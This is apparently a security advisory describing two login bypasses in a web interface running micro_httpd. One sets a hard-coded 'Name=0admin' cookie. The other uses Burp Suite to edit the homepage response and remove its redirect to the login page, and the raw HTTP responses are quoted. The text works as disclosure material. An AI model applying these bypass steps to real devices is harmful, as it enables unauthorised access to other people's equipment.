The vulnerability exists in plain text & hard coded cookie. Using any cookie manager extension, an attacker can bypass login page by setting the following Master Cookie. Cookie: Name=0admin. Then access the homepage which will no longer require authentication. Due to improper session implementation, there is another way to bypass login. The response header of homepage without authentication looks like this. HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html><head><script language='javascript'> parent.location='login.html' </script></head><body></body></html>HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source. The response header looks totally messed up and by triggering burp suite and modifying it to following will grant access to homepage without authentication. HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close <html> <head>.. continue to actual homepage source.